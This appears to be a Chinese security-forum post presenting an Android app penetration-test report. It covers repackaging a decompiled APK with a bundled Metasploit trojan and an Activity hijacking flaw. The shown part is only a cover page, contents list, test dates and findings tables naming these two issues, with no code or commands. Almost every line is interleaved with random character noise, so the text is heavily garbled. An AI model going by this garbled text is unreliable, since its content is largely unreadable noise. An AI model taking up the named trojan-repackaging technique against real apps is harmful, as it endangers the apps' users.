找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4608|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
+ k& n* y7 f* {' d2 o 5 E9 K- [0 X) o7 o' |! d

( G1 H5 j4 N( G) I % C# w7 c; a- }. n
$ V# k7 M; C8 l - {- M3 x. ^+ q$ H7 \+ r) K

; j8 A7 Y; A5 M, a* |. G8 K- M " X7 S% I8 ]6 A; F
1 Q5 k. ~/ n& i0 \7 d0 y 4 p) P7 }( o- P- a3 {; A+ T' \! ~

) g* E( s s1 s* B7 ^1 \4 b8 b# d5 a) r5 \5 h 文档编号:                ' Q8 n. t2 U' a- h9 e & i9 ~) N) E: }1 K! |

6 ~) v6 a( r; } % H2 U+ h2 u' h* L/ J" J

+ e1 n0 @* ^* b3 ]: B+ l" p " `* c) o. D6 J) Y1 ], g, d   1 R* }6 q$ c. o8 v. f/ h& W1 D - U1 _) P2 C, \4 _6 j' q" i

# v" {; e5 S* O4 G 0 ]- _5 z' c- T1 f$ {

$ Z& |. P0 p' @1 D3 T# p: n 4 \: K- r; D, L, \8 ~. M   ' T. O; w, M( I- L3 l 4 b$ ]. ~- d8 V( ~& T5 Q

; `! |7 ~6 h/ U: L) ~2 [- w4 v R0 c7 A, h9 f

) s! l/ A+ r& X- s7 l/ C - c; e6 P& V- S% \+ }   + C/ o2 u, K M) p# { Q) _! \! A# H) e. Y

7 ]7 V8 T7 `7 s/ a 0 g7 ^9 h# S+ ^* y! @+ }

% D2 F6 \! z- }7 T + J1 O" {9 B+ ]2 O$ V" ?- U   9 |3 w6 h9 A. L& x$ O e) d0 c- V1 q

- B2 w$ Y! F: T% N6 E' f2 a# ]% f- M3 Z* `: p

9 b& ^6 ~" J. ]' D. n% T6 z1 \ 3 `3 e# f3 J2 J2 D+ N! Z9 K   : m; @: X( Q! S5 |) l4 Q, ^" ^$ P ' |# A+ e" |' w" k- r C

2 o/ Y& J7 C6 Y3 n( [ 6 y- G& S0 X8 [# { V8 s

9 q9 A; e" a3 _3 u7 y3 M0 ?! u: N0 g" t! G3 p8 u 某某某APP渗透测试 % a0 ]/ D R2 o 3 C+ U+ }, s7 ?3 }0 x& k* l

0 s4 t! L! r1 d/ o7 D1 k0 k! _ ( E! {, H" @0 J7 E

) D( N) v% B# u. Z7 L. m/ m4 E 8 g { e+ m* ?5 ?   2 O" n# t# W# i0 [* \ + n7 B( g- q/ T

1 R; n" p+ v1 c* ? 2 z, @* ?6 }: X2 H$ y/ w3 L

! ] {! Y0 ^; S) g- I& }) g4 E+ B% F& }   + f# S. I! ^; F$ E# S. \: }5 d" h7 k- o& X( w

% ?" D& r+ H h ?8 f \/ ? & ` x" W' i5 a$ P% m1 q

& _3 w0 M8 A4 d8 v' B/ { 1 x- _' \& s: q* ~/ L f   4 h7 g2 s A# P! v' i& E" C2 f ( }# ~2 ]( B, |5 @" b

3 t6 g+ m: f8 W- p/ t8 L8 _ 9 ^# R7 D- Y+ X) {

0 E/ L0 X. ~" ]$ C ! T" o& e: I0 t6 ^' r L0 e# S   4 _6 c2 F/ `: ?8 Z2 y 6 v& z$ h' y/ S6 G( \

& n. F3 _# ^, l* Y) B( k7 Z d: L. ^% H) T3 I" p- w+ G/ [

z7 t0 S' P* C9 b3 G 9 y7 u9 {+ s2 Y 技 术 报 告 & b4 [: |6 c0 G3 B& H # X7 E# c- R3 _9 [

- N. X; n% i1 h1 E( o- L9 x4 A S2 S4 T

: e# F) i. \7 k ( {. L" o1 @9 v* Z) q& i2 B7 s   1 ^1 D4 p' m+ R: `3 P+ b& U% }& E7 X

/ }4 D3 i# S" J4 M4 L: t4 R/ C# r3 v7 [ ^. X

8 j( O2 V% h* c5 Z - @9 b, F" m% }/ \( x% |1 b9 L   3 T2 b0 z! m8 W2 Q 9 p* @1 X) L) X$ |

' k; a- K: x! O7 x3 ` 2 H% j6 z) D+ ?/ S

7 I1 p2 v0 y' I. r% z+ z; i! U9 n/ I0 M% }+ K6 x, ]   ; H/ O# |4 k# x& M; N " ~1 A1 ^9 v* v# S- G

% f, ?% V3 g Q$ j' g0 ?1 I7 ~) p* m6 m

- Y/ W- E9 A. l9 Z6 r: M . j; k0 F" D9 L8 R8 l% S   9 x9 H# L$ x1 u1 J0 `0 a" | % y( V: F% ^0 D

2 b, E( G( E1 r9 C# u- G3 k7 l 2 m- E$ c/ ]3 U$ C

4 W$ R+ Z* x) B, S( p9 R7 w/ P1 @/ Y8 I! [( d% E   ( g! s+ B9 t( a- r ! @9 l4 }# T- I# v4 K4 |

+ \" _) [! f2 Z, r+ q. p ; K# i, ^3 k7 r3 g1 h7 w

. X. T3 F! T6 D+ p2 i" N4 u1 Y/ Q- S . ?* Q9 u9 J n) A- H   2 f/ j. M2 j9 s9 Y; O* P* x. z# I b b2 i2 {9 A

8 n& I1 I( T2 k6 x$ |) _ ; _, J! t: a6 v. t% X: C

: q Q9 C/ S/ Z& B 9 }7 z6 t% v7 r2 \   % [ S& D& n! |& ? 7 v4 V: U! w( W5 U* m

" D- @, R: R& j" n7 I$ t9 F 3 P- A, O. U0 g: A1 k0 E, u0 l

4 {: z; d: ?1 K& r' w* {5 o' Y7 I( e* _- l$ l2 R% v   " j. [* W: g0 w+ a . A( q, a: G {; M; \' K! x( i

8 @/ e) x! u& r9 Q& Z8 W$ R1 | : W& l1 s) e9 A. q4 q( g5 a* ]

2 A8 W# L7 i2 `8 w& n/ A7 \' A; g& _/ d% f   / D _2 ]; D: P% ^; x % X# U& M* y2 s l B2 b" P6 o

$ ?7 z2 v5 Z; x# \7 \1 l4 D + {' y9 f E6 u1 v# q

- B, Y6 D% c+ |, M . r# n# L0 ^6 R$ r6 X* Y. Q   Q4 Z9 K% t! Z w, Q- N7 N {, t: {/ l' y% J& a7 n

9 a+ Z7 ^, J! z 5 I: r, Y# |7 I4 Q; a

$ D! z) y. z. J/ M 6 c# @4 t' |2 D# H4 H3 b9 Z$ k. L   6 O( Z" I( M) S) a/ K( q$ J C w

: \; x& R7 O/ m" R- V! Z 3 O4 v& ~2 |$ S% g

" @# ~7 G0 [' K% O( n1 u/ ]2 c1 F% q# _4 H   # z F% \+ R; h) L; j" R' z, d5 p/ T, q: C1 k: g" E

' ]9 r6 I' s& V, U! Y 2 r; {: ]1 y$ K$ y) G8 r

5 U6 g! h4 v% e: ?+ N& i5 Z' C. s/ W, f. K$ e( }- y   ! b1 F+ [$ O+ Q # j# T7 q- s+ P% _ @9 O4 h

2 `/ j. l# ~" t1 b/ V% G6 | O4 @0 Z 8 f1 f u* F3 B ^) S% ^ O# F

8 y8 l' W$ T2 Q8 U I 6 L" _, T u4 C4 O9 E   . d2 E9 f, o1 i) X6 \+ Y ; U) q6 _) m1 Z9 P& R/ m

! D# `& L0 W5 c4 B& d ) r7 P6 _- K0 \; |# V' K7 a

' z3 y9 R$ J; N9 E2 x; v a" N4 n) Y * j3 x9 @& l: R! Z6 M! s   ( c ~" @ {! R( v" L 0 l8 {4 S, @& K+ y# ^: k Q

- W7 c" o+ b. X- h" d: Z& h5 H8 g- k3 P & \, X) v, s: M0 _: h) c2 |

% S9 b' M2 b# A; t' T+ r) I1 e 3 v- p& H9 z( d! O" c/ A8 T# G' a   ; {/ `4 s7 b o/ C& y2 X , _+ H% I) ~& Y& \# D" ?

9 r% I2 @- c; w6 T O- f+ ^8 a6 u! \* G! _

; h; Z$ ^, J: z, m+ ?4 @; L 3 S5 @$ Z) ]3 b   ' m1 s. f) P1 @* v4 z) q1 J ] * I& g# M# ^; z: k

! d4 m5 H& ^; }4 }& U1 D $ a) R( j8 g1 B; C/ G( @

; O& G; j# \: U; J! O0 D5 h+ y 7 D2 i% a1 o" S9 q1 P$ j/ d   * D& Y) d5 P1 m# L9 \: F 4 \( L5 U' `* e3 d" }

5 v2 t, }1 j# [+ e3 k ) I0 V# X3 G9 a1 Q

$ x# o# b8 D2 j4 ~ & D# C" ]' p o% K& z. j9 K 二〇二〇年 $ \ X( Q% \$ x9 r$ F" H: j6 H" @/ `2 w3 Y* Q; Z$ i

, t! |# J P! s, N* y$ x; y- L* `4 y, U M- L- |4 T
6 M/ b4 p0 J: |& i( t p- J, g# d) A. G! z! G1 i
7 Q; v' f. P/ o/ q3 D ! S9 |+ ]* `) p$ k
4 p- O& W9 c/ s' W) L9 q ' z/ X% Z2 f! S; p( ^: Z* i, K" {
) G( v6 ]7 |: O+ J5 `0 \- p, e U . E4 C" e9 N. s% V, { E/ V
3 g# ?3 C# O2 W- V+ R- E& f 0 q7 l! `. |5 q& H, [
* P7 X5 f9 J' K6 m & Z5 U" i8 i& { q6 H
8 g# i6 S& ?$ s" R5 j2 l" I, D , y" D1 P5 ?# B
) m1 l0 |6 e9 E 3 t7 F# N/ `! t' i8 H' j

! L) ]2 O! h' P; K' D0 s, \, Z, t) Y : `: V7 V6 |/ @0 w4 Z! z 目 录 6 P4 Q9 a; S3 C& k* K8 } 7 l C L0 j' H; E3 O8 M! {2 p

- `+ [5 @& G. i$ K% _) @, c . j; }8 z. u# H . R, R/ E; G3 l1 e: I( K4 Z8 t. A

; {9 B( z* K5 V9 T7 _* o7 k1 i$ n' |: o# ~   ! N. B1 p5 L! D, e 1 P8 X* I: `; y; e

- }* j) U0 ~8 U/ B5 x# g2 C6 Z9 q0 F$ L$ }( U' l! Q+ B. |

1 N- w# c/ M9 P- u4 p1 b+ _. H ; Y& ?8 [1 ?8 f0 B2 } 1 概述... 3 % P4 o, E1 c! G6 D M " g1 T' }. T, v

$ ]3 N* N3 @ h' m8 ]. Y, _; i& H . {# @! m: T+ ?- o+ M9 r

) i: o$ p9 w+ ~- m; t9 t2 W/ z9 X 1 _3 w4 m0 r, o 1.2测试时间... 3 5 p0 g' ]( n* n# H% b) c + a+ ?( \, z1 G. b

# h4 d- H- Z4 v' w& A & J! C5 P% w0 u/ r) @

6 {' y$ h! _. g+ }" H3 \; e% k% ?4 H+ B# Y: R* ` 1.3测试对象... 3 ; J' `7 [: b z3 k5 H% G# C) m% u3 N; g6 S2 m* D5 j7 \

- p6 @ F6 o, [: k% B$ ?. u9 _ % ?0 f1 M0 ]. a( c; W

7 h) b1 r, a$ O3 S + i+ m/ ]! G! p* x; f) @( w4 B 1.4测试结果... 3 7 {. n9 E4 j% ?% U1 P: h, h' k # C5 H2 h$ l1 H k) [

1 k/ p6 v6 C, q0 p6 f# Y 1 q) c' E$ V) ~; _; d0 M

7 m, P2 Q: E# J D6 J ! E- e! B i& I% K* a$ ? 2 检测结果... 4 . \ ~1 _& e2 E7 R" K2 @& I% N 6 x7 Q. J7 f6 ] v

$ r7 y* \7 _% x. Y/ v' |. X - a6 n. Z# X e3 O& O" R

! C# g( E7 s9 ~6 H j7 h 8 s8 I: \5 ]2 @& [+ L' q 2.1 某某某... 4 9 k+ [! z9 z' r: h * t: L3 h; g) Q5 ~% f

E+ W1 `7 _7 {7 { `4 e ]& @2 v9 O- V; ~3 W! D, H- B

& F; y$ K3 u& }" U% d5 R' v* Q0 w8 K% Q 2.1.1检测目标... 4 4 p* t2 o* n) U5 L 6 ~) H/ h+ y/ y/ i* Q0 `' _

p4 f1 @/ t* ~+ h( b: c6 w + N2 Y7 ^( q( ^

! ~7 v: C# ~1 g5 ~) Z7 f6 o4 { % h: W5 _+ |1 @$ @' C3 S& @( d4 j 2.1.2检测结果... 4 ) \' H! ?9 H3 i # S9 n8 ~; C( }/ b

3 {9 U; M& K% i % ]% J! M8 }3 g, ^- w2 k: P

9 s. F, _/ p5 }/ E! e0 f8 D% }/ B% J2 d, `3 o$ q1 Q 2.1.2.1. 4 * f2 e: }8 w% ~5 b! | 7 f0 e& l* r* [6 c$ T

6 m9 \0 T$ F; I8 p5 k2 Q0 E6 r8 `. _

) o* r$ f6 J& H5 b: x; ?: K( ~$ M8 ? 2.1.2.2. 6 / A4 m- O/ S5 `# H# \, L2 O, ^4 ~$ |& v8 }4 Z& o2 z

) w4 P0 @' |! b* ~9 t- i3 Q- F7 D2 q3 s- n9 o6 z y

! H, _" F# C2 w4 Y ; n* L+ H6 i: o7 V3 X# _9 O( ? $ k7 J, Q# `' H0 v % ^4 e+ E/ m- i) f8 ]/ f7 p

% j: h- N. z. i+ ]5 G! ~9 Y " T2 i! q! m/ V/ J& Q+ Y } l
, y$ ?, o6 S- H 0 a; w5 s* I% _# ~
8 a8 a. ]( c8 t . M' ?7 o- q* h1 b
+ f* `& D# e5 G( L ) z- y( z8 Q5 j3 H
2 ?+ X$ A) q/ R 1 A: G0 c, F) E' {' a

J( h+ ^- C5 U9 {; h* d, ~: w2 J9 z2 P }4 r) |$ e 1 概述 6 a9 r8 A5 j) U6 i) \$ ]6 H9 ]0 l" X; D; P4 D

' ~# @. ]+ o& E' z# x, Y/ Z % d. A5 ^3 N/ O# x7 s

6 O3 k! y! a7 q0 V4 D8 ]3 i8 v, {; ?0 v8 J 1.2测试时间 4 J& x1 l/ Y9 _1 _5 w/ ^) W . G+ P$ e @# O3 j

+ N u* O* W2 G ' i0 s0 [7 y3 {4 ]8 o ' l$ u7 ~/ E2 P! u5 U, S# c; m. r, l3 J7 D& W$ E0 h& X: }% B% \- R- `# e5 q; A( C6 k) n: j& G& T$ w$ t/ M2 B. ^+ n2 P! y: H& B1 I: D# s$ b- c. X9 T# V0 v* {1 \( R9 p+ ~ m9 H$ Z) f6 r9 g0 o* |! r* H$ }8 k' |* [% a; S& a& }+ t6 T, w2 R0 O$ w# M; k g* Z5 ?4 d" A0 f% `, _7 M5 y! q: `" g) J& I0 |8 D% d4 S1 K5 I, Q" q# b( ^" o Y3 V& _! u( T& E" q5 J4 J) g2 l0 v9 K, ^& Z0 `% V7 U2 _6 y" o* g* m/ \ A) W- ]; i7 s3 C7 z) M2 z+ F, j: r2 ?# }7 \3 O! q, o% N( M; l5 M: A1 `* z/ t3 h$ O' e; B. U( w& Z5 W) P( J" H$ Y1 z4 Z3 C* {: ~* m" v1 P; f. S& ]1 ?. P6 s5 w7 f& Z* o# s0 \7 ]& U! I7 @! p0 z- _6 k' ^$ y% H2 Q3 h2 r: M1 g& k& T. a/ W
2 y4 e+ q9 @' P& s 0 j) ?8 b' y& W; m

/ l! i5 R7 R0 F1 o : Z5 S4 k; J/ K/ }- q& l 渗透测试时间 : ? C( o- m ^) B ! W% `* @ v* h3 ?! w

' b* E7 h+ K& _4 M; \$ U ( u/ @9 v9 A" m+ m* g* J/ [
( R1 j' f& B0 K1 Y) h& r I. k+ p: q2 A$ `) Y

5 c& L0 k7 [) y5 a# `& D( X - c" s. s! g3 W( ^2 T. `( [ 起始时间 ) V+ g# L& B& `. d# O 2 g4 Q% A% s/ S6 P' y5 H

( p& k3 W4 B1 e2 x) o$ n: {& J 2 n% R9 O( z+ ?. F
+ G8 l) N$ o! S4 r 9 [* W3 p$ {* X7 z$ e4 y6 T$ J( @

; ~9 m- e" j( F4 A. p2 E / [. f( A7 A: H- m 202046 % X, I' H% _: N' `9 @' r ) X) i! P; M* }+ n8 E& g. z

5 A5 p# g+ f% o [* @1 X' W2 o 2 y2 }' \: @3 P, u# Q
& x& @) }/ Q0 \: Z3 p" n2 \1 h 5 J, ~- |- {+ Z) ]" T9 R0 q) ]

; [7 y" ~: G: H$ p$ a9 J) E9 k, o4 {! @) _8 x- N- d; O1 B 结束时间 9 s& a: i; x% ~% e& w& N* M; T0 r 9 `1 M" C2 z9 p( e! l

7 a- t# N5 M3 ` 9 n$ Y' R9 c" K+ `+ E: e0 K3 i% k
& `! }0 C" j' h$ \ & S6 Q& b7 _/ [/ E d; \; j

$ x: \$ K& W3 }' T- D : q- _: K; e" I r 202049 / H! f q: s' D8 _6 Z5 W, ] 7 p: [" r3 U _' ~: p

1 }$ k/ V# i' x! F% |; F, n9 V
9 k: a; n# J7 } 6 o4 z; B9 E$ V }' o/ V! q

- O5 J: E8 j3 \$ L; _ 5 V) j$ q- J! c$ q. t 1.3测试对象 4 i- W. ?8 u& N% q ' h: p; B0 ~9 F8 B# C7 h

. P7 e) t0 K, }/ ?: f7 r9 B l$ V3 S9 `) m2 `2 w$ R( u

- w. N( A( M$ a4 R- Y$ f3 r& p+ _ ! t( r5 U3 `1 T" C7 M) p7 A. F 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / `; G* R3 S; [7 _0 b! i9 I* @1 y4 n' [8 x& E8 Z" u3 v( N. z

! O+ i' c# U6 u7 o5 f! k & v! i4 @ }7 p7 B0 u) M

* {6 X1 H+ W/ F N& ?' G l' f3 ^" E6 U6 B# B 1-1 检测对象 ' R# T3 R8 { h' A& Z4 J4 x/ b / T5 w( H# F1 G2 N" z% U8 f

) x! | u! \, S% B, f, E 6 Y3 c: J& g) F1 ?6 _( S 0 u. y: I4 g8 S3 L1 k& {8 E: _! l2 o- G2 O$ k. t9 \1 {- S+ B8 W0 C: n; L6 ~& z8 E( R# R. h4 u) j$ f6 J) F' `/ R, Q8 b% D( }- R( r5 E7 ?9 {! B: E8 v! t) t0 h! b( e% d8 F1 y) S! U( P- U# B& U. z+ g4 H( ~6 P, O; A/ u! C& e, d2 Z+ ?2 h# E# B+ O; j& Y% v/ k7 K$ q# q3 e" y6 p5 G( [( v& J. Z4 I$ E) ~2 L' u3 C q4 Z! l V5 u9 |1 d: c- Q- Y9 y% j l2 `- e! m3 S+ g9 H+ I: U* @" H- i! D2 f; J0 ?! o- d5 Z9 y6 s. Z' J) E- Z S3 W4 e e) g! J" v$ z, g+ y# H( O7 A" v- }: g1 \; U: I, R! z$ u7 b* j$ X0 Q6 j; {5 y: A" V: }7 k4 C* X# v, c) ^1 e0 N( h7 D ], p/ x1 Y9 M! X2 C! q( x M% ^* k7 o" S; q+ {1 C+ g* d+ c' A' C& k( M7 a$ M: J% ~2 Y" v/ I9 b0 P1 R* V/ W1 c. L$ l1 F+ n9 [+ E# q6 A! a. u& F6 m( o* u O0 ^3 a! J: g# J( g) q! r7 e- e; `0 f4 u& D
' s% Y& {6 T6 E2 K n& c) j 2 w* F1 b5 B) m" k* n5 Y+ c" t2 |, \

: ]# D2 z# Z: e4 P1 k# x ?- r% k , ? z- s0 r3 [6 c6 T0 x5 Z% U 序号 / _0 P7 `8 g, m9 i7 o6 { 9 L! w* W8 y+ L- S# i. V3 g7 k. r: w

! d, E0 i+ l" ? 7 H0 D4 e, ]1 }0 Q/ h
& r) \- e4 w9 n7 h % V4 l" J% `1 V M4 c& u ]( P! G+ C

' e: w6 c% i c/ w) S 1 @6 q; o3 b2 ]! y: t: X# @ 测试对象 ( ^# {5 F' H' o' h4 @ 1 R5 R4 Q& z% E8 p+ J* M

# d, P9 N+ C6 r4 P 4 S. d2 ]3 @/ C3 |
5 [3 @! k9 w) ^* y; m5 ~$ R9 _# h( }* @8 B$ t4 t! ?3 U

* r- ^) ]) U0 `/ u; o) f$ O. Q. P ! K9 q) T0 y9 L) F# W$ A) ~/ u* F 测试地址 8 E# A$ H3 W* q) w) v2 B" O3 H- V" N3 `: X! i

+ J# i3 F Y) D; C2 j# Y - x2 l4 F! H& } I3 c" y& o/ I. X
/ {: \8 I; r: {2 u0 e0 |9 n( G! i( Y& A |- p

5 _3 I: F! l& _2 j+ c/ L8 p . u, Z. z/ B9 b$ J 安全漏洞 8 j( p- ]1 y+ T9 H5 O& l9 q& D$ G; H - E, h& ^- q6 }1 N

( a9 Z4 g( v6 L1 P / h7 |9 y1 {% N' v/ j! O7 p
* m* A, |& b8 I 7 L! w$ ?5 Y. t4 I3 d

1 L" N6 o* M0 d; G5 V* v: K 4 B8 i$ N8 ~) w9 q% R2 _ 1 ' Z' q7 T6 m/ |+ N 7 t5 b: X R5 X

* ~" H. e6 d5 u# a4 o' z P4 X; d5 S' X o8 W8 w8 S/ j& l9 o
$ v' n6 F1 `2 X ^; d8 G7 C5 q D: Z+ u & U$ I @( G& x2 U0 T. e/ T& p! R

. o# F6 T4 H3 s* u1 O* [( C6 g" }$ {+ c 某某某安卓APP 7 C- V* N, ?5 Y5 Z6 x; z" d$ `. X8 k

( L8 w( m9 s. U0 { ( b2 |9 E( s& N6 O9 m' {5 o. T
8 i# A0 ^/ h' W( [: j' J. q, x 3 W- M* Q% z7 `$ V+ Z

( R; m" j _& X9 s+ E$ B : O7 a* h: u* ]* a) l   9 D' U% y; k3 q, I. {( s" G M! T# [( S* Q

2 T8 e' Z* a0 y: U$ D0 l- w. m% l1 |/ O+ H/ d7 o
r" G( X: C/ q. q6 Z, Z6 T $ ~8 n, A: A; L9 s

# I7 C& o8 _2 v" e" u . n7 G$ O0 e7 ]3 d: z! o 2 4 A" b+ N# t* s% k ! l, x4 F/ _6 I% @5 h$ g

) q: q5 Z& B' E) H4 S- {8 t7 @1 D- G" G3 J# O
8 V v5 a7 @2 O* y! D) z! n, s" ^' E# l' }2 x, X% q- B

7 l# C; J, d; h - n7 `/ \1 m7 y 1.4测试结果 % }( I+ K% y8 f9 y- ]/ ~1 ` 6 G- d2 D& b. e8 G: |

, T6 M! C' o/ R* N" _ ) R+ C" | ^- U+ `+ r3 T! g

$ h; P1 [8 V( D, r / J! t+ U5 u1 d; t1 ~* q. X 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ) P2 T4 ?) ?6 T2 O F G9 n" W# R 0 A Q9 H$ C! v K( K, u

7 j: d- O9 ?) @) X3 X' e 7 d6 D' l5 U+ c

* z0 ]8 T& @8 N4 j# ]" m 1 B4 G% |) } Z( @   ; Y) o4 `9 d0 S4 y- h/ q0 F. e" F6 ]0 U6 b# m: u ^# k' ]

* ?% ?- n8 Z6 d+ u" N" h* j , E9 }9 z- X0 |5 {* _- w
6 V4 H) z4 f! C% ~: H9 T* I / M" \) m1 \* m3 N; l0 O % u- \4 L3 j( Z3 E/ B) b8 c \/ b. d" N/ {/ i# y7 O& Z) u+ y# A& V$ ?& ^' }# P8 X+ U9 w: W; r- l3 Z7 f& M* ~* v5 U1 v6 v- a0 I3 X& C( M! O7 t4 j- u: ]5 p: D, V( A5 d( p! ~7 T% O! q" B! V6 N% d, t: f, ^5 _/ C4 \* ^& u8 a: h+ Z$ Y9 t' ^. Y% J7 B- n5 m# K5 s2 I4 s4 u7 v0 W% z2 e$ q% }8 o! s2 _: w: o8 W! ?3 t: Q' `5 \+ W5 l5 h5 N3 P. p- `7 T8 ^8 t9 x/ F8 l; o+ j# W' {4 p! x+ `0 c( F9 D5 H5 t# ^1 v* S( f5 T' w5 H, |) U/ p V$ V$ i3 W" n0 {, d1 c- `' h K* A( r6 J- @. k% ]+ D3 S" C- P/ a3 Y8 k# T% X# M* P: h9 l8 b) h9 q8 Q4 B" J+ j$ M: M9 } K. V0 o" s2 D, g3 ~4 t0 R6 V! T' t4 W9 ~! N0 `9 Y- N7 J8 b9 H2 u: o* g) B0 _3 H% [- `+ Y7 c# E+ R* {: A! n/ ^7 w# j; k H. G* [$ U2 s h& p' e# x$ |9 k8 R9 I0 I. b. N7 {& A. N; M; ]4 E0 g" A) Y) |3 Y5 I7 Z* j2 b& e; J. W' Y+ P0 G$ _0 f" f# N3 d8 b! y- P, m: q) R. Z, [8 W4 P) Z9 d/ a; B8 ~1 i l1 n) X; Q* d& ` v" O+ F$ t- b) }5 x3 h" s7 G# x" O5 j5 r5 V2 R- o4 | X6 a4 u( ~! B. v! x+ X2 S6 d. D; H; t' }* a9 }$ n4 `5 `; k( c. U/ D7 L( @* w& q3 |3 e; y, Y: R) r4 Z8 L7 Y/ G% z. F4 V4 }/ o n/ u9 B5 v/ q e- M2 b9 P6 ~7 d6 O( L+ v: o: J- i* V1 D- W! z- ]: x! [/ h: g: y$ P2 ]2 x& A7 t
0 r* J3 H& H! q , B; n" ]* i8 b/ q9 d

" a: U3 L$ b2 z/ L4 F3 {* o9 I" S t 序号 ; ~* l- d5 G$ n0 v 1 Z9 H- U8 }+ M7 j* n9 M

$ a1 d( A! M/ I( v7 y: p # y% U. \! i H+ N
) U% v0 p" C4 i6 l6 T: h2 } / q3 @" I% {! g! F1 M9 n$ w. [

; F9 [: Y9 R, M* U' E8 q8 h % Q/ X+ W. \% k- _1 j 系统名称 ( z$ g8 e+ X9 l1 K7 p* r* B. c! i. J) z( z! z! T

P9 r) C' O, k6 g! X# c$ C- _& `/ D1 n5 c* b8 W7 E4 ?
+ o4 G- K- Y, j* h1 \9 z8 G7 a$ ~ ' _, f9 P J M' t; V8 Q

% e. v9 z& W, [ / r) ?8 K7 r+ Z2 h( ?" D 漏洞名称 ' t3 q8 x# t- c5 E5 o% o& h$ @* |. a% k

0 W! y' @, L4 f% \- y# Z4 t % t8 x# v; Y) ^ G: e) r
2 n/ h& l' o0 E' r1 g6 H: z- o- E2 c1 O3 e, b( w) k' X5 @ J# m

* B" }( j$ d) u# f1 D q3 ?5 t 4 V% e( I8 d( {+ d! C 漏洞危害 ( ^. s8 j5 q4 S' n5 o/ g % \8 D. N) v0 J

8 p4 t% W6 F0 B/ [ ' Y8 N( o8 e* R! {
e1 m: o! I- {) Q$ K! a" I. S. u( B) N5 A1 A. ~

$ K! p3 a6 Q" p' R; `& F7 Q: \, p+ [5 p6 G- E6 v1 |, f6 Z4 C, E 修复结果 . @ a9 z& N2 }# K2 o / `9 u, J6 F8 r3 S# ^! E/ B; o

; G8 n& Y E2 h# T1 B! w5 x5 V0 l* C9 i) ^ O, ~3 Q
0 W1 c' T# D, ?# V ~, [, e3 l2 }1 ]0 Z, a `$ H

; F# U, I: Q. ?1 R6 G7 D" r4 l $ W: I, O# b9 P7 Z2 f 1 # O( X. n/ w1 H* p6 U ) a5 L! l2 V5 O9 L" v0 B% S

3 P; o# Y( b" b/ ]- E# u7 C1 B" h9 A( \% d' v3 `: F# W
; W7 X$ a5 V$ L- d/ _* L1 N* j + @6 N! t! h7 H' y. Y. o1 L

# J5 m; [; r, |( [0 g; _; I" ~5 a. u0 Z( {* o: l( L. M, Y 某某某某某某APP % T5 G. Z3 O# Q* h5 D: C * \: I2 |% | R# e* v/ t. L

$ `7 Q5 v- \$ l5 L& R% l' S. e/ Q8 P6 Z- t& Q1 O! F
* t0 v4 q/ ~( G- j$ r+ ]. m- w; m; }3 O

- a2 ~# D) o8 b; v* \: m: j " s. N5 \" M( k: B2 |6 y5 ^5 q; P Activity 劫持 . t4 t2 A5 P ]! ~# f " O$ ~/ ?0 L" b$ ?4 A& M

- V0 a1 T* E' j6 A, A" r3 W; n6 O* ~1 N K

5 A5 ]" W) H0 H. v+ n ) t- B( ]; Q1 Q/ R; T" n# J1 H' c   5 W) q: @4 H1 E3 S 1 e9 E/ D$ H+ A3 T5 f' y9 R

9 L7 F, \4 n! x$ J, v 2 @% [, d1 _4 t+ i9 P0 W8 j
. m, e, L- ?: C1 w v" u! d: x ) n7 v& l& ^; i+ x k

' Q7 U4 d$ C- Z0 H3 ?6 z , o+ Z$ e! @3 a# l4 x' K ( L' x7 N8 n5 U* U9 B1 L6 u3 d G3 Q# c

0 ]9 j" H/ z1 r* T6 V 0 F0 e4 p# e+ i# Q+ V
7 ?# Z8 O; c, Z( P" H+ ` 4 }1 a2 h" T1 G1 L1 {: l9 U+ r

" a Z9 I/ ]: [' f7 H8 N9 _ * k1 ]5 G4 u) U, H) k   9 }5 E- L/ ?' Q; b, K . T6 i& O1 [. i1 p2 k

: [7 r) |2 w" Z5 o' E1 j 2 m! Z/ b0 q8 L9 {5 P7 p
2 [( @* S0 S2 {7 s9 F- N" y ; \* P2 U3 g1 i9 L$ A

7 u5 |' R! U2 ?4 D" B3 K# V; F) I. w+ t+ H& C 2 , D6 H4 ] A6 z- v) g8 d/ q' ^- [! @7 z" I+ r# K3 u

4 y. b" I% ?/ l' z# K! N; B4 _$ Y- h$ Y! a6 T9 ~, v+ |3 h1 M
, f9 D) H& z1 }. R% s2 m' I6 x2 x; Z9 [% a: x

) I' E h7 h7 q: {, b" A- W; n% Z - j# N U: \( p2 u 某某某某某某APP 9 ^0 g1 i, E$ E! r7 \" V# p6 S % b* _6 y8 _& x, j

0 z- \3 H3 g2 J: ?9 o+ u5 n, f ' C8 } k( z% {: W, k; Q/ T2 s+ S6 z
; f8 a; V& C4 X 5 z* J3 L3 L) o7 l' X) g

8 I) V6 Y8 D% H/ A6 S$ d7 I6 m / p1 l* X9 N% m% F' D 反编译二次打包捆绑木马、篡改APP代码 5 q- V+ N* l, Q1 b4 \ {0 }( b& y( z3 ?" @

# G& e8 C% S6 v9 h! n/ [ % x9 B9 z- d& t- ^( C
. e* d6 x5 l( G# a " S! X( c( ^! c; ~1 z

9 v7 O4 @1 i `0 `1 J. { . ~/ I) B7 M/ v" b0 U- M0 M $ y; o8 E6 h, ~ : @2 W; o/ I: ^& W1 z5 K! D

8 _! l: U8 U* c e# i 1 N6 w0 \; y; y: a; ?9 ~5 W, |7 H$ r
, Z% W1 m1 }$ v' }, H$ l9 x; q* {% ~- b, [2 o# ^

2 I" x) \. p- L) H* F, n: b# X . r, @! s6 _2 ^- J   : q# O: |( x* p. J$ H+ L ( f# d3 N5 u0 I. |

6 l; K d0 n: O' `8 t- W2 j6 F% k2 r* i# f. b
" p& ~. @ t, }# {3 l9 w & z' E( C* A. R! s; y
: x9 H6 E: |' U5 p x( [! H3 ~- p) x' ?9 S

& {& l2 q/ E9 T Z0 q+ K0 I' d) Q/ B : U [3 K8 M$ ?   & b' s& C w; A! ~$ j ) u. a4 ]! b; h! O0 k

, q" @4 @/ |' a0 j* ?7 {1 R8 w/ f# ~+ W+ u7 B1 K" m! }7 @

